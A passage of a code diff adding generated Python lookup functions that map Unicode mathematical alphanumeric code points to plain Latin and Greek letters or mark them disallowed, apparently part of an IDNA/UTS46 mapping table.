'M', 'i'), + (0x1D423, 'M', 'j'), + (0x1D424, 'M', 'k'), + (0x1D425, 'M', 'l'), + (0x1D426, 'M', 'm'), + (0x1D427, 'M', 'n'), + (0x1D428, 'M', 'o'), + (0x1D429, 'M', 'p'), + (0x1D42A, 'M', 'q'), + (0x1D42B, 'M', 'r'), + (0x1D42C, 'M', 's'), + (0x1D42D, 'M', 't'), + (0x1D42E, 'M', 'u'), + (0x1D42F, 'M', 'v'), + (0x1D430, 'M', 'w'), + ] + +def _seg_61() -> List[Union[Tuple[int, str], Tuple[int, str, str]]]: + return [ + (0x1D431, 'M', 'x'), + (0x1D432, 'M', 'y'), + (0x1D433, 'M', 'z'), + (0x1D434, 'M', 'a'), + (0x1D435, 'M', 'b'), + (0x1D436, 'M', 'c'), + (0x1D437, 'M', 'd'), + (0x1D438, 'M', 'e'), + (0x1D439, 'M', 'f'), + (0x1D43A, 'M', 'g'), + (0x1D43B, 'M', 'h'), + (0x1D43C, 'M', 'i'), + (0x1D43D, 'M', 'j'), + (0x1D43E, 'M', 'k'), + (0x1D43F, 'M', 'l'), + (0x1D440, 'M', 'm'), + (0x1D441, 'M', 'n'), + (0x1D442, 'M', 'o'), + (0x1D443, 'M', 'p'), + (0x1D444, 'M', 'q'), + (0x1D445, 'M', 'r'), + (0x1D446, 'M', 's'), + (0x1D447, 'M', 't'), + (0x1D448, 'M', 'u'), + (0x1D449, 'M', 'v'), + (0x1D44A, 'M', 'w'), + (0x1D44B, 'M', 'x'), + (0x1D44C, 'M', 'y'), + (0x1D44D, 'M', 'z'), + (0x1D44E, 'M', 'a'), + (0x1D44F, 'M', 'b'), + (0x1D450, 'M', 'c'), + (0x1D451, 'M', 'd'), + (0x1D452, 'M', 'e'), + (0x1D453, 'M', 'f'), + (0x1D454, 'M', 'g'), + (0x1D455, 'X'), + (0x1D456, 'M', 'i'), + (0x1D457, 'M', 'j'), + (0x1D458, 'M', 'k'), + (0x1D459, 'M', 'l'), + (0x1D45A, 'M', 'm'), + (0x1D45B, 'M', 'n'), + 
(0x1D45C, 'M', 'o'), + (0x1D45D, 'M', 'p'), + (0x1D45E, 'M', 'q'), + (0x1D45F, 'M', 'r'), + (0x1D460, 'M', 's'), + (0x1D461, 'M', 't'), + (0x1D462, 'M', 'u'), + (0x1D463, 'M', 'v'), + (0x1D464, 'M', 'w'), + (0x1D465, 'M', 'x'), + (0x1D466, 'M', 'y'), + (0x1D467, 'M', 'z'), + (0x1D468, 'M', 'a'), + (0x1D469, 'M', 'b'), + (0x1D46A, 'M', 'c'), + (0x1D46B, 'M', 'd'), + (0x1D46C, 'M', 'e'), + (0x1D46D, 'M', 'f'), + (0x1D46E, 'M', 'g'), + (0x1D46F, 'M', 'h'), + (0x1D470, 'M', 'i'), + (0x1D471, 'M', 'j'), + (0x1D472, 'M', 'k'), + (0x1D473, 'M', 'l'), + (0x1D474, 'M', 'm'), + (0x1D475, 'M', 'n'), + (0x1D476, 'M', 'o'), + (0x1D477, 'M', 'p'), + (0x1D478, 'M', 'q'), + (0x1D479, 'M', 'r'), + (0x1D47A, 'M', 's'), + (0x1D47B, 'M', 't'), + (0x1D47C, 'M', 'u'), + (0x1D47D, 'M', 'v'), + (0x1D47E, 'M', 'w'), + (0x1D47F, 'M', 'x'), + (0x1D480, 'M', 'y'), + (0x1D481, 'M', 'z'), + (0x1D482, 'M', 'a'), + (0x1D483, 'M', 'b'), + (0x1D484, 'M', 'c'), + (0x1D485, 'M', 'd'), + (0x1D486, 'M', 'e'), + (0x1D487, 'M', 'f'), + (0x1D488, 'M', 'g'), + (0x1D489, 'M', 'h'), + (0x1D48A, 'M', 'i'), + (0x1D48B, 'M', 'j'), + (0x1D48C, 'M', 'k'), + (0x1D48D, 'M', 'l'), + (0x1D48E, 'M', 'm'), + (0x1D48F, 'M', 'n'), + (0x1D490, 'M', 'o'), + (0x1D491, 'M', 'p'), + (0x1D492, 'M', 'q'), + (0x1D493, 'M', 'r'), + (0x1D494, 'M', 's'), + ] + +def _seg_62() -> List[Union[Tuple[int, str], Tuple[int, str, str]]]: + return [ + (0x1D495, 'M', 't'), + (0x1D496, 'M', 'u'), + (0x1D497, 'M', 'v'), + (0x1D498, 'M', 'w'), + (0x1D499, 'M', 'x'), + (0x1D49A, 'M', 'y'), + (0x1D49B, 'M', 'z'), + (0x1D49C, 'M', 'a'), + (0x1D49D, 'X'), + (0x1D49E, 'M', 'c'), + (0x1D49F, 'M', 'd'), + (0x1D4A0, 'X'), + (0x1D4A2, 'M', 'g'), + (0x1D4A3, 'X'), + (0x1D4A5, 'M', 'j'), + (0x1D4A6, 'M', 'k'), + (0x1D4A7, 'X'), + (0x1D4A9, 'M', 'n'), + (0x1D4AA, 'M', 'o'), + (0x1D4AB, 'M', 'p'), + (0x1D4AC, 'M', 'q'), + (0x1D4AD, 'X'), + (0x1D4AE, 'M', 's'), + (0x1D4AF, 'M', 't'), + (0x1D4B0, 'M', 'u'), + (0x1D4B1, 'M', 'v'), + (0x1D4B2, 'M', 'w'), + (0x1D4B3, 'M', 'x'), + (0x1D4B4, 'M', 'y'), + (0x1D4B5, 'M', 'z'), + (0x1D4B6, 'M', 'a'), + (0x1D4B7, 'M', 'b'), + (0x1D4B8, 'M', 'c'), + (0x1D4B9, 'M', 'd'), + (0x1D4BA, 'X'), + (0x1D4BB, 'M', 'f'), + (0x1D4BC, 'X'), + (0x1D4BD, 'M', 'h'), + (0x1D4BE, 'M', 'i'), + (0x1D4BF, 'M', 'j'), + (0x1D4C0, 'M', 'k'), + (0x1D4C1, 'M', 'l'), + (0x1D4C2, 'M', 'm'), + (0x1D4C3, 'M', 'n'), + (0x1D4C4, 'X'), + (0x1D4C5, 'M', 'p'), + (0x1D4C6, 'M', 'q'), + (0x1D4C7, 'M', 'r'), + (0x1D4C8, 'M', 's'), + (0x1D4C9, 'M', 't'), + (0x1D4CA, 'M', 'u'), + (0x1D4CB, 'M', 'v'), + (0x1D4CC, 'M', 'w'), + (0x1D4CD, 'M', 'x'), + (0x1D4CE, 'M', 'y'), + (0x1D4CF, 'M', 'z'), + (0x1D4D0, 'M', 'a'), + (0x1D4D1, 'M', 'b'), + (0x1D4D2, 'M', 'c'), + (0x1D4D3, 'M', 'd'), + (0x1D4D4, 'M', 'e'), + (0x1D4D5, 'M', 'f'), + (0x1D4D6, 'M', 'g'), + (0x1D4D7, 'M', 'h'), + (0x1D4D8, 'M', 'i'), + (0x1D4D9, 'M', 'j'), + (0x1D4DA, 'M', 'k'), + (0x1D4DB, 'M', 'l'), + (0x1D4DC, 'M', 'm'), + (0x1D4DD, 'M', 'n'), + (0x1D4DE, 'M', 'o'), + (0x1D4DF, 'M', 'p'), + (0x1D4E0, 'M', 'q'), + (0x1D4E1, 'M', 'r'), + (0x1D4E2, 'M', 's'), + (0x1D4E3, 'M', 't'), + (0x1D4E4, 'M', 'u'), + (0x1D4E5, 'M', 'v'), + (0x1D4E6, 'M', 'w'), + (0x1D4E7, 'M', 'x'), + (0x1D4E8, 'M', 'y'), + (0x1D4E9, 'M', 'z'), + (0x1D4EA, 'M', 'a'), + (0x1D4EB, 'M', 'b'), + (0x1D4EC, 'M', 'c'), + (0x1D4ED, 'M', 'd'), + (0x1D4EE, 'M', 'e'), + (0x1D4EF, 'M', 'f'), + (0x1D4F0, 'M', 'g'), + (0x1D4F1, 'M', 'h'), + (0x1D4F2, 'M', 'i'), + (0x1D4F3, 'M', 'j'), + (0x1D4F4, 'M', 'k'), + (0x1D4F5, 'M', 'l'), + (0x1D4F6, 'M', 'm'), + (0x1D4F7, 
'M', 'n'), + (0x1D4F8, 'M', 'o'), + (0x1D4F9, 'M', 'p'), + (0x1D4FA, 'M', 'q'), + (0x1D4FB, 'M', 'r'), + ] + +def _seg_63() -> List[Union[Tuple[int, str], Tuple[int, str, str]]]: + return [ + (0x1D4FC, 'M', 's'), + (0x1D4FD, 'M', 't'), + (0x1D4FE, 'M', 'u'), + (0x1D4FF, 'M', 'v'), + (0x1D500, 'M', 'w'), + (0x1D501, 'M', 'x'), + (0x1D502, 'M', 'y'), + (0x1D503, 'M', 'z'), + (0x1D504, 'M', 'a'), + (0x1D505, 'M', 'b'), + (0x1D506, 'X'), + (0x1D507, 'M', 'd'), + (0x1D508, 'M', 'e'), + (0x1D509, 'M', 'f'), + (0x1D50A, 'M', 'g'), + (0x1D50B, 'X'), + (0x1D50D, 'M', 'j'), + (0x1D50E, 'M', 'k'), + (0x1D50F, 'M', 'l'), + (0x1D510, 'M', 'm'), + (0x1D511, 'M', 'n'), + (0x1D512, 'M', 'o'), + (0x1D513, 'M', 'p'), + (0x1D514, 'M', 'q'), + (0x1D515, 'X'), + (0x1D516, 'M', 's'), + (0x1D517, 'M', 't'), + (0x1D518, 'M', 'u'), + (0x1D519, 'M', 'v'), + (0x1D51A, 'M', 'w'), + (0x1D51B, 'M', 'x'), + (0x1D51C, 'M', 'y'), + (0x1D51D, 'X'), + (0x1D51E, 'M', 'a'), + (0x1D51F, 'M', 'b'), + (0x1D520, 'M', 'c'), + (0x1D521, 'M', 'd'), + (0x1D522, 'M', 'e'), + (0x1D523, 'M', 'f'), + (0x1D524, 'M', 'g'), + (0x1D525, 'M', 'h'), + (0x1D526, 'M', 'i'), + (0x1D527, 'M', 'j'), + (0x1D528, 'M', 'k'), + (0x1D529, 'M', 'l'), + (0x1D52A, 'M', 'm'), + (0x1D52B, 'M', 'n'), + (0x1D52C, 'M', 'o'), + (0x1D52D, 'M', 'p'), + (0x1D52E, 'M', 'q'), + (0x1D52F, 'M', 'r'), + (0x1D530, 'M', 's'), + (0x1D531, 'M', 't'), + (0x1D532, 'M', 'u'), + (0x1D533, 'M', 'v'), + (0x1D534, 'M', 'w'), + (0x1D535, 'M', 'x'), + (0x1D536, 'M', 'y'), + (0x1D537, 'M', 'z'), + (0x1D538, 'M', 'a'), + (0x1D539, 'M', 'b'), + (0x1D53A, 'X'), + (0x1D53B, 'M', 'd'), + (0x1D53C, 'M', 'e'), + (0x1D53D, 'M', 'f'), + (0x1D53E, 'M', 'g'), + (0x1D53F, 'X'), + (0x1D540, 'M', 'i'), + (0x1D541, 'M', 'j'), + (0x1D542, 'M', 'k'), + (0x1D543, 'M', 'l'), + (0x1D544, 'M', 'm'), + (0x1D545, 'X'), + (0x1D546, 'M', 'o'), + (0x1D547, 'X'), + (0x1D54A, 'M', 's'), + (0x1D54B, 'M', 't'), + (0x1D54C, 'M', 'u'), + (0x1D54D, 'M', 'v'), + (0x1D54E, 'M', 'w'), + (0x1D54F, 'M', 'x'), + (0x1D550, 'M', 'y'), + (0x1D551, 'X'), + (0x1D552, 'M', 'a'), + (0x1D553, 'M', 'b'), + (0x1D554, 'M', 'c'), + (0x1D555, 'M', 'd'), + (0x1D556, 'M', 'e'), + (0x1D557, 'M', 'f'), + (0x1D558, 'M', 'g'), + (0x1D559, 'M', 'h'), + (0x1D55A, 'M', 'i'), + (0x1D55B, 'M', 'j'), + (0x1D55C, 'M', 'k'), + (0x1D55D, 'M', 'l'), + (0x1D55E, 'M', 'm'), + (0x1D55F, 'M', 'n'), + (0x1D560, 'M', 'o'), + (0x1D561, 'M', 'p'), + (0x1D562, 'M', 'q'), + ] + +def _seg_64() -> List[Union[Tuple[int, str], Tuple[int, str, str]]]: + return [ + (0x1D563, 'M', 'r'), + (0x1D564, 'M', 's'), + (0x1D565, 'M', 't'), + (0x1D566, 'M', 'u'), + (0x1D567, 'M', 'v'), + (0x1D568, 'M', 'w'), + (0x1D569, 'M', 'x'), + (0x1D56A, 'M', 'y'), + (0x1D56B, 'M', 'z'), + (0x1D56C, 'M', 'a'), + (0x1D56D, 'M', 'b'), + (0x1D56E, 'M', 'c'), + (0x1D56F, 'M', 'd'), + (0x1D570, 'M', 'e'), + (0x1D571, 'M', 'f'), + (0x1D572, 'M', 'g'), + (0x1D573, 'M', 'h'), + (0x1D574, 'M', 'i'), + (0x1D575, 'M', 'j'), + (0x1D576, 'M', 'k'), + (0x1D577, 'M', 'l'), + (0x1D578, 'M', 'm'), + (0x1D579, 'M', 'n'), + (0x1D57A, 'M', 'o'), + (0x1D57B, 'M', 'p'), + (0x1D57C, 'M', 'q'), + (0x1D57D, 'M', 'r'), + (0x1D57E, 'M', 's'), + (0x1D57F, 'M', 't'), + (0x1D580, 'M', 'u'), + (0x1D581, 'M', 'v'), + (0x1D582, 'M', 'w'), + (0x1D583, 'M', 'x'), + (0x1D584, 'M', 'y'), + (0x1D585, 'M', 'z'), + (0x1D586, 'M', 'a'), + (0x1D587, 'M', 'b'), + (0x1D588, 'M', 'c'), + (0x1D589, 'M', 'd'), + (0x1D58A, 'M', 'e'), + (0x1D58B, 'M', 'f'), + (0x1D58C, 'M', 'g'), + (0x1D58D, 'M', 'h'), + (0x1D58E, 'M', 'i'), + 
(0x1D58F, 'M', 'j'), + (0x1D590, 'M', 'k'), + (0x1D591, 'M', 'l'), + (0x1D592, 'M', 'm'), + (0x1D593, 'M', 'n'), + (0x1D594, 'M', 'o'), + (0x1D595, 'M', 'p'), + (0x1D596, 'M', 'q'), + (0x1D597, 'M', 'r'), + (0x1D598, 'M', 's'), + (0x1D599, 'M', 't'), + (0x1D59A, 'M', 'u'), + (0x1D59B, 'M', 'v'), + (0x1D59C, 'M', 'w'), + (0x1D59D, 'M', 'x'), + (0x1D59E, 'M', 'y'), + (0x1D59F, 'M', 'z'), + (0x1D5A0, 'M', 'a'), + (0x1D5A1, 'M', 'b'), + (0x1D5A2, 'M', 'c'), + (0x1D5A3, 'M', 'd'), + (0x1D5A4, 'M', 'e'), + (0x1D5A5, 'M', 'f'), + (0x1D5A6, 'M', 'g'), + (0x1D5A7, 'M', 'h'), + (0x1D5A8, 'M', 'i'), + (0x1D5A9, 'M', 'j'), + (0x1D5AA, 'M', 'k'), + (0x1D5AB, 'M', 'l'), + (0x1D5AC, 'M', 'm'), + (0x1D5AD, 'M', 'n'), + (0x1D5AE, 'M', 'o'), + (0x1D5AF, 'M', 'p'), + (0x1D5B0, 'M', 'q'), + (0x1D5B1, 'M', 'r'), + (0x1D5B2, 'M', 's'), + (0x1D5B3, 'M', 't'), + (0x1D5B4, 'M', 'u'), + (0x1D5B5, 'M', 'v'), + (0x1D5B6, 'M', 'w'), + (0x1D5B7, 'M', 'x'), + (0x1D5B8, 'M', 'y'), + (0x1D5B9, 'M', 'z'), + (0x1D5BA, 'M', 'a'), + (0x1D5BB, 'M', 'b'), + (0x1D5BC, 'M', 'c'), + (0x1D5BD, 'M', 'd'), + (0x1D5BE, 'M', 'e'), + (0x1D5BF, 'M', 'f'), + (0x1D5C0, 'M', 'g'), + (0x1D5C1, 'M', 'h'), + (0x1D5C2, 'M', 'i'), + (0x1D5C3, 'M', 'j'), + (0x1D5C4, 'M', 'k'), + (0x1D5C5, 'M', 'l'), + (0x1D5C6, 'M', 'm'), + ] + +def _seg_65() -> List[Union[Tuple[int, str], Tuple[int, str, str]]]: + return [ + (0x1D5C7, 'M', 'n'), + (0x1D5C8, 'M', 'o'), + (0x1D5C9, 'M', 'p'), + (0x1D5CA, 'M', 'q'), + (0x1D5CB, 'M', 'r'), + (0x1D5CC, 'M', 's'), + (0x1D5CD, 'M', 't'), + (0x1D5CE, 'M', 'u'), + (0x1D5CF, 'M', 'v'), + (0x1D5D0, 'M', 'w'), + (0x1D5D1, 'M', 'x'), + (0x1D5D2, 'M', 'y'), + (0x1D5D3, 'M', 'z'), + (0x1D5D4, 'M', 'a'), + (0x1D5D5, 'M', 'b'), + (0x1D5D6, 'M', 'c'), + (0x1D5D7, 'M', 'd'), + (0x1D5D8, 'M', 'e'), + (0x1D5D9, 'M', 'f'), + (0x1D5DA, 'M', 'g'), + (0x1D5DB, 'M', 'h'), + (0x1D5DC, 'M', 'i'), + (0x1D5DD, 'M', 'j'), + (0x1D5DE, 'M', 'k'), + (0x1D5DF, 'M', 'l'), + (0x1D5E0, 'M', 'm'), + (0x1D5E1, 'M', 'n'), + (0x1D5E2, 'M', 'o'), + (0x1D5E3, 'M', 'p'), + (0x1D5E4, 'M', 'q'), + (0x1D5E5, 'M', 'r'), + (0x1D5E6, 'M', 's'), + (0x1D5E7, 'M', 't'), + (0x1D5E8, 'M', 'u'), + (0x1D5E9, 'M', 'v'), + (0x1D5EA, 'M', 'w'), + (0x1D5EB, 'M', 'x'), + (0x1D5EC, 'M', 'y'), + (0x1D5ED, 'M', 'z'), + (0x1D5EE, 'M', 'a'), + (0x1D5EF, 'M', 'b'), + (0x1D5F0, 'M', 'c'), + (0x1D5F1, 'M', 'd'), + (0x1D5F2, 'M', 'e'), + (0x1D5F3, 'M', 'f'), + (0x1D5F4, 'M', 'g'), + (0x1D5F5, 'M', 'h'), + (0x1D5F6, 'M', 'i'), + (0x1D5F7, 'M', 'j'), + (0x1D5F8, 'M', 'k'), + (0x1D5F9, 'M', 'l'), + (0x1D5FA, 'M', 'm'), + (0x1D5FB, 'M', 'n'), + (0x1D5FC, 'M', 'o'), + (0x1D5FD, 'M', 'p'), + (0x1D5FE, 'M', 'q'), + (0x1D5FF, 'M', 'r'), + (0x1D600, 'M', 's'), + (0x1D601, 'M', 't'), + (0x1D602, 'M', 'u'), + (0x1D603, 'M', 'v'), + (0x1D604, 'M', 'w'), + (0x1D605, 'M', 'x'), + (0x1D606, 'M', 'y'), + (0x1D607, 'M', 'z'), + (0x1D608, 'M', 'a'), + (0x1D609, 'M', 'b'), + (0x1D60A, 'M', 'c'), + (0x1D60B, 'M', 'd'), + (0x1D60C, 'M', 'e'), + (0x1D60D, 'M', 'f'), + (0x1D60E, 'M', 'g'), + (0x1D60F, 'M', 'h'), + (0x1D610, 'M', 'i'), + (0x1D611, 'M', 'j'), + (0x1D612, 'M', 'k'), + (0x1D613, 'M', 'l'), + (0x1D614, 'M', 'm'), + (0x1D615, 'M', 'n'), + (0x1D616, 'M', 'o'), + (0x1D617, 'M', 'p'), + (0x1D618, 'M', 'q'), + (0x1D619, 'M', 'r'), + (0x1D61A, 'M', 's'), + (0x1D61B, 'M', 't'), + (0x1D61C, 'M', 'u'), + (0x1D61D, 'M', 'v'), + (0x1D61E, 'M', 'w'), + (0x1D61F, 'M', 'x'), + (0x1D620, 'M', 'y'), + (0x1D621, 'M', 'z'), + (0x1D622, 'M', 'a'), + (0x1D623, 'M', 'b'), + (0x1D624, 'M', 'c'), + (0x1D625, 'M', 
'd'), + (0x1D626, 'M', 'e'), + (0x1D627, 'M', 'f'), + (0x1D628, 'M', 'g'), + (0x1D629, 'M', 'h'), + (0x1D62A, 'M', 'i'), + ] + +def _seg_66() -> List[Union[Tuple[int, str], Tuple[int, str, str]]]: + return [ + (0x1D62B, 'M', 'j'), + (0x1D62C, 'M', 'k'), + (0x1D62D, 'M', 'l'), + (0x1D62E, 'M', 'm'), + (0x1D62F, 'M', 'n'), + (0x1D630, 'M', 'o'), + (0x1D631, 'M', 'p'), + (0x1D632, 'M', 'q'), + (0x1D633, 'M', 'r'), + (0x1D634, 'M', 's'), + (0x1D635, 'M', 't'), + (0x1D636, 'M', 'u'), + (0x1D637, 'M', 'v'), + (0x1D638, 'M', 'w'), + (0x1D639, 'M', 'x'), + (0x1D63A, 'M', 'y'), + (0x1D63B, 'M', 'z'), + (0x1D63C, 'M', 'a'), + (0x1D63D, 'M', 'b'), + (0x1D63E, 'M', 'c'), + (0x1D63F, 'M', 'd'), + (0x1D640, 'M', 'e'), + (0x1D641, 'M', 'f'), + (0x1D642, 'M', 'g'), + (0x1D643, 'M', 'h'), + (0x1D644, 'M', 'i'), + (0x1D645, 'M', 'j'), + (0x1D646, 'M', 'k'), + (0x1D647, 'M', 'l'), + (0x1D648, 'M', 'm'), + (0x1D649, 'M', 'n'), + (0x1D64A, 'M', 'o'), + (0x1D64B, 'M', 'p'), + (0x1D64C, 'M', 'q'), + (0x1D64D, 'M', 'r'), + (0x1D64E, 'M', 's'), + (0x1D64F, 'M', 't'), + (0x1D650, 'M', 'u'), + (0x1D651, 'M', 'v'), + (0x1D652, 'M', 'w'), + (0x1D653, 'M', 'x'), + (0x1D654, 'M', 'y'), + (0x1D655, 'M', 'z'), + (0x1D656, 'M', 'a'), + (0x1D657, 'M', 'b'), + (0x1D658, 'M', 'c'), + (0x1D659, 'M', 'd'), + (0x1D65A, 'M', 'e'), + (0x1D65B, 'M', 'f'), + (0x1D65C, 'M', 'g'), + (0x1D65D, 'M', 'h'), + (0x1D65E, 'M', 'i'), + (0x1D65F, 'M', 'j'), + (0x1D660, 'M', 'k'), + (0x1D661, 'M', 'l'), + (0x1D662, 'M', 'm'), + (0x1D663, 'M', 'n'), + (0x1D664, 'M', 'o'), + (0x1D665, 'M', 'p'), + (0x1D666, 'M', 'q'), + (0x1D667, 'M', 'r'), + (0x1D668, 'M', 's'), + (0x1D669, 'M', 't'), + (0x1D66A, 'M', 'u'), + (0x1D66B, 'M', 'v'), + (0x1D66C, 'M', 'w'), + (0x1D66D, 'M', 'x'), + (0x1D66E, 'M', 'y'), + (0x1D66F, 'M', 'z'), + (0x1D670, 'M', 'a'), + (0x1D671, 'M', 'b'), + (0x1D672, 'M', 'c'), + (0x1D673, 'M', 'd'), + (0x1D674, 'M', 'e'), + (0x1D675, 'M', 'f'), + (0x1D676, 'M', 'g'), + (0x1D677, 'M', 'h'), + (0x1D678, 'M', 'i'), + (0x1D679, 'M', 'j'), + (0x1D67A, 'M', 'k'), + (0x1D67B, 'M', 'l'), + (0x1D67C, 'M', 'm'), + (0x1D67D, 'M', 'n'), + (0x1D67E, 'M', 'o'), + (0x1D67F, 'M', 'p'), + (0x1D680, 'M', 'q'), + (0x1D681, 'M', 'r'), + (0x1D682, 'M', 's'), + (0x1D683, 'M', 't'), + (0x1D684, 'M', 'u'), + (0x1D685, 'M', 'v'), + (0x1D686, 'M', 'w'), + (0x1D687, 'M', 'x'), + (0x1D688, 'M', 'y'), + (0x1D689, 'M', 'z'), + (0x1D68A, 'M', 'a'), + (0x1D68B, 'M', 'b'), + (0x1D68C, 'M', 'c'), + (0x1D68D, 'M', 'd'), + (0x1D68E, 'M', 'e'), + ] + +def _seg_67() -> List[Union[Tuple[int, str], Tuple[int, str, str]]]: + return [ + (0x1D68F, 'M', 'f'), + (0x1D690, 'M', 'g'), + (0x1D691, 'M', 'h'), + (0x1D692, 'M', 'i'), + (0x1D693, 'M', 'j'), + (0x1D694, 'M', 'k'), + (0x1D695, 'M', 'l'), + (0x1D696, 'M', 'm'), + (0x1D697, 'M', 'n'), + (0x1D698, 'M', 'o'), + (0x1D699, 'M', 'p'), + (0x1D69A, 'M', 'q'), + (0x1D69B, 'M', 'r'), + (0x1D69C, 'M', 's'), + (0x1D69D, 'M', 't'), + (0x1D69E, 'M', 'u'), + (0x1D69F, 'M', 'v'), + (0x1D6A0, 'M', 'w'), + (0x1D6A1, 'M', 'x'), + (0x1D6A2, 'M', 'y'), + (0x1D6A3, 'M', 'z'), + (0x1D6A4, 'M', 'ı'), + (0x1D6A5, 'M', 'ȷ'), + (0x1D6A6, 'X'), + (0x1D6A8, 'M', 'α'), + (0x1D6A9, 'M', 'β'), + (0x1D6AA, 'M', 'γ'), + (0x1D6AB, 'M', 'δ'), + (0x1D6AC, 'M', 'ε'), + (0x1D6AD, 'M', 'ζ'), + (0x1D6AE, 'M', 'η'), + (0x1D6AF, 'M', 'θ'), + (0x1D6B0, 'M', 'ι'), + (0x1D6B1, 'M', 'κ'), + (0x1D6B2, 'M', 'λ'), + (0x1D6B3, 'M', 'μ'), + (0x1D6B4, 'M', 'ν'), + (0x1D6B5, 'M', 'ξ'), + (0x1D6B6, 'M', 'ο'), + (0x1D6B7, 'M', 'π'), + (0x1D6B8, 'M', 'ρ'), + (0x1D6B9, 'M', 
'θ'), + (0x1D6BA, 'M', 'σ'), + (0x1D6BB, 'M', 'τ'), + (0x1D6BC, 'M', 'υ'), + (0x1D6BD, 'M', 'φ'), + (0x1D6BE, 'M', 'χ'), + (0x1D6BF, 'M', 'ψ'), + (0x1D6C0, 'M', 'ω'), + (0x1D6C1, 'M', '∇'), + (0x1D6C2, 'M', 'α'), + (0x1D6C3, 'M', 'β'), + (0x1D6C4, 'M', 'γ'), + (0x1D6C5, 'M', 'δ'), + (0x1D6C6, 'M', 'ε'), + (0x1D6C7, 'M', 'ζ'), + (0x1D6C8, 'M', 'η'), + (0x1D6C9, 'M', 'θ'), + (0x1D6CA, 'M', 'ι'), + (0x1D6CB, 'M', 'κ'), + (0x1D6CC, 'M', 'λ'), + (0x1D6CD, 'M', 'μ'), + (0x1D6CE, 'M', 'ν'), + (0x1D6CF, 'M', 'ξ'), + (0x1D6D0, 'M', 'ο'), + (0x1D6D1, 'M', 'π'), + (0x1D6D2, 'M', 'ρ'), + (0x1D6D3, 'M', 'σ'), + (0x1D6D5, 'M', 'τ'), + (0x1D6D6, 'M', 'υ'), + (0x1D6D7, 'M', 'φ'), + (0x1D6D8, 'M', 'χ'), + (0x1D6D9, 'M', 'ψ'), + (0x1D6DA, 'M', 'ω'), + (0x1D6DB, 'M', '∂'), + (0x1D6DC, 'M', 'ε'), + (0x1D6DD, 'M', 'θ'), + (0x1D6DE, 'M', 'κ'), + (0x1D6DF, 'M', 'φ'), + (0x1D6E0, 'M', 'ρ'), + (0x1D6E1, 'M', 'π'), + (0x1D6E2, 'M', 'α'), + (0x1D6E3, 'M', 'β'), + (0x1D6E4, 'M', 'γ'), + (0x1D6E5, 'M', 'δ'), + (0x1D6E6, 'M', 'ε'), + (0x1D6E7, 'M', 'ζ'), + (0x1D6E8, 'M', 'η'), + (0x1D6E9, 'M', 'θ'), + (0x1D6EA, 'M', 'ι'), + (0x1D6EB, 'M', 'κ'), + (0x1D6EC, 'M', 'λ'), + (0x1D6ED, 'M', 'μ'), + (0x1D6EE, 'M', 'ν'), + (0x1D6EF, 'M', 'ξ'), + (0x1D6F0, 'M', 'ο'), + (0x1D6F1, 'M', 'π'), + (0x1D6F2, 'M', 'ρ'), + (0x1D6F3, 'M', 'θ'), + (0x1D6F4, 'M', 'σ'), + ] + +def _seg_68() -> List[Union[Tuple[int, str], Tuple[int, str, str]]]: + return [ + (0x1D6F5, 'M', 'τ'), + (0x1D6F6, 'M', 'υ'), + (0x1D6F7, 'M', 'φ'), + (0x1D6F8, 'M', 'χ'), + (0x1D6F9, 'M', 'ψ'), + (0x1D6FA, 'M', 'ω'), + (0x1D6FB, 'M', '∇'), + (0x1D6FC, 'M', 'α'), + (0x1D6FD, 'M', 'β'), + (0x1D6FE, 'M', 'γ'), + (0x1D6FF, 'M', 'δ'), + (0x1D700, 'M', 'ε'), + (0x1D701, 'M', 'ζ'), + (0x1D702, 'M', 'η'), + (0x1D703, 'M', 'θ'), + (0x1D704, 'M', 'ι'), + (0x1D705, 'M', 'κ'), + (0x1D706, 'M', 'λ'), + (0x1D707, 'M', 'μ'), + (0x1D708, 'M', 'ν'), + (0x1D709, 'M', 'ξ'), + (0x1D70A, 'M', 'ο'), + (0x1D70B, 'M', 'π'), + (0x1D70C, 'M', 'ρ'), + (0x1D70D, 'M', 'σ'), + (0x1D70F, 'M', 'τ'), + (0x1D710, 'M', 'υ'), + (0x1D711, 'M', 'φ'), + (0x1D712, 'M', 'χ'), + (0x1D713, 'M', 'ψ'), + (0x1D714, 'M', 'ω'), + (0x1D715, 'M', '∂'), + (0x1D716, 'M', 'ε'), + (0x1D717, 'M', 'θ'), + (0x1D718, 'M', 'κ'), + (0x1D719, 'M', 'φ'), + (0x1D71A, 'M', 'ρ'), + (0x1D71B, 'M', 'π'), + (0x1D71C, 'M', 'α'), + (0x1D71D, 'M', 'β'), + (0x1D71E, 'M', 'γ'), + (0x1D71F, 'M', 'δ'), + (0x1D720, 'M', 'ε'), + (0x1D721, 'M', 'ζ'), + (0x1D722, 'M', 'η'), + (0x1D723, 'M', 'θ'), + (0x1D724, 'M', 'ι'), + (0x1D725, 'M', 'κ'), + (0x1D726, 'M', 'λ'), + (0x1D727, 'M', 'μ'), + (0x1D728, 'M', 'ν'), + (0x1D729, 'M', 'ξ'), + (0x1D72A, 'M', 'ο'), + (0x1D72B, 'M', 'π'), + (0x1D72C, 'M', 'ρ'), + (0x1D72D, 'M', 'θ'), + (0x1D72E, 'M', 'σ'), + (0x1D72F, 'M', 'τ'), + (0x1D730, 'M', 'υ'), + (0x1D731, 'M', 'φ'), + (0x1D732, 'M', 'χ'), + (0x1D733, 'M', 'ψ'), + (0x1D734, 'M', 'ω'), + (0x1D735, 'M', '∇'), + (0x1D736, 'M', 'α'), + (0x1D737, 'M', 'β'), + (0x1D738, 'M', 'γ'), + (0x1D739, 'M', 'δ'), + (0x1D73A, 'M', 'ε'), + (0x1D73B, 'M', 'ζ'), + (0x1D73C, 'M', 'η'), + (0x1D73D, 'M', 'θ'), + (0x1D73E, 'M', 'ι'), + (0x1D73F, 'M', 'κ'), + (0x1D740, 'M', 'λ'), + (0x1D741, 'M', 'μ'), + (0x1D742, 'M', 'ν'), + (0x1D743, 'M', 'ξ'), + (0x1D744, 'M', 'ο'), + (0x1D745, 'M', 'π'), + (0x1D746, 'M', 'ρ'), + (0x1D747, 'M', 'σ'), + (0x1D749, 'M', 'τ'), + (0x1D74A, 'M', 'υ'), + (0x1D74B, 'M', 'φ'), + (0x1D74C, 'M', 'χ'), + (0x1D74D, 'M', 'ψ'), + (0x1D74E, 'M', 'ω'), + (0x1D74F, 'M', '∂'), + (0x1D750, 'M', 'ε'), + (0x1D751, 'M', 'θ'), + (0x1D752, 'M', 'κ'), + (0x1D753, 
